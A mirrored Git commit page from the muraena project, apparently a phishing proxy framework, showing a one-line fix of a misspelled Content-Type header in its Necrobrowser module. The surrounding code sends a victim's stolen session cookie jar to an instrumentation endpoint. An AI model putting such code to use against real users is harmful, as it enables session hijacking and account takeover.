mirror of
https://github.com/muraenateam/muraena.git
synced 2026-01-23 02:24:05 +00:00
fix necrobrowser wrong content-type
This commit is contained in:
parent
1631e41a2a
commit
21bfe2611d
1 changed files with 1 additions and 1 deletions
|
|
@ -232,7 +232,7 @@ func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCoo
|
|||
module.Info("instrumenting %s", tui.Bold(tui.Red(victimID)))
|
||||
client := resty.New()
|
||||
resp, err := client.R().
|
||||
SetHeader("Content-LandingType", "application/json").
|
||||
SetHeader("Content-Type", "application/json").
|
||||
SetBody(newRequest).
|
||||
Post(module.Endpoint)
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue